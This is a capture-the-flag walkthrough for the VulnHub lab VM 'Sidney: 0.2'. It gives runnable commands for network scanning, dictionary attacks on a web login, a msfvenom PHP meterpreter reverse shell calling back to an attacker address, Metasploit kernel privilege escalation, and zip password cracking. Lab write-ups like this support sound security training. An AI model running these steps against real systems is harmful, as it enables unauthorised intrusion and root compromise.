Today
we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2 made by Nightmares.This
is the third challenge he genially came up with. The VM is set to grab a DHCP
lease on boot. As before, gaining root is not the end of this VM. You will need
to snag the flag. You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/
Breaching Methodolgies:
1.
Network Scanning
(Nmap, netdiscover)
2. Information gathering:
·
web server enumeration (view source)
·
Directory brute-force (dirb)
·
Wikipedia
3. Generate
own Dictionary (crunch)
4. Login
into admin console
5. Generate
PHP Backdoor (Msfvenom)
6. Upload
and execute a backdoor
7. Reverse
connection (Metasploit)
8. Kernel
privilege escalation (Metasploit)
9. Gain
root access
10. Penetrate
for flag.zip
11. Access
Ram and finished the task
First
things we need to know what IP did the VM got. So naturally scan the network
using:
netdiscover
Now that we have located our target IP i.e. 192.168.1.103, our
next step is to scan it.
nmap -A -p- 192.168.1.103
Upon scanning we know that port number 80 is open that means
this IP will open in the browser so let us try and do that.
Then we decided to look into its page source.
So we opened it in the browser (192.168.1.103/commorode64)
and to our luck we found another page.
As you will read the page source you will come to know that
username is robhubbard and going further you will find some
hints about the password i.e. :
- the
password is in lowercase
- password
has 3 letters and four digits
- and it
is related to c=64 sound chip
Then we run dirb for web directory brute-force attack and
here it has shown so many directories. But I was interested in index.php and
decide to explore it.
So we opened it and as you can see it is asking for username
and password. Now, we already know what is the username, we just have to find
the password.
Getting the above hints about
password, we firstly decided to look up c=64
sound chip on wikipedia. And we found:
We knew that password’s first three digits are alphabetic
letters and so our best guess is MOS are the first three
digits of the password.
Now everything falls on the last four digits of the password
and finds that we used crunch command.
crunch 7 7 -t mos%%%% -o /root/Desktop/dict. txt
Crunch will generate your dictionary file.
And then apply dictionary attack using Burp Suite and then
it will result in showing you the password as shown below:
Now on the index.php page enter the username and password. Following page will open and on this page you have to upload a malicious php file
Entering the password you will logon to the following page:
Now to generate the said php open the terminal in your Kali
and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108
lport=4444 -f raw
Simultaneously start multi handler inside metasploit
framework.
Copy the code from to die() and
save it in a file with .php extension. Now upload this file by browsing it on
the webpage.
Meanwhile, return to the
Metasploit terminal and wait for the metepreter session by exploiting
multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler)
set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler)
set lhost 192.168.1.108
msf exploit(multi/handler)
set lport 4444
msf exploit(multi/handler)
exploit
From given below image you can
observe Meterpreter session 1. But task is not finished yet,
still we need to penetrate more for privilege escalation.
By executing sysinfo
we came to know about the target’s architecture i.e. kernel 4.4; and with help of this we found metasploit exploit for
kernel privilege escalation. Further type following command:
use exploit/linux/local/bpf_priv_esc
msf exploit(linux/local/bpf_priv_esc) > set
session 1
msf exploit(linux/local/bpf_priv_esc) > set
lhost192.168.1.108
msf exploit(linux/local/bpf_priv_esc) > set lport
8888
msf exploit(linux/local/bpf_priv_esc) > exploit
And it will give 2nd meterpreter session with
root privilege, now let’s get into root directory and capture the flag.
cd /root
ls
It gave us hint.gif file, let’s download it.
download hint.gif
/root/Desktop/
So when we opened hint.gif it has shown below image and I
was unable to take-out hint from their conversation.
Further I execute following command:
cd .commodor64
ls
cd .miami
ls
cd vice
ls
Here is flag.zip file let’s download it on our desktop with
help of following command:
download flag.zip
/root/Desktop/
We will apply dictionary attack using rockyou.txt so for
this the command is:
fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt
flag.zip
And yes, at last you have the password. So now unzip the
flag.zip by typing:
unzip flag.zip
Then it will ask you the password. Enter the recently
obtained password here.
And YAY!!!!! We have captured the Flag!!! Enjoy with it.
0 comments:
Post a Comment